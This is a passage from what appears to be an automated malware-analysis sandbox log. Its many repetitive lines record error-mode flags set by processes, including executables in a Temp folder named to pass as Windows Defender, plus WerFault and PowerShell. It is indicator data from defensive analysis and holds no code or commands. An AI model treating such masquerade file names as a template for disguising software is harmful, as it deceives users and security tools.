Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
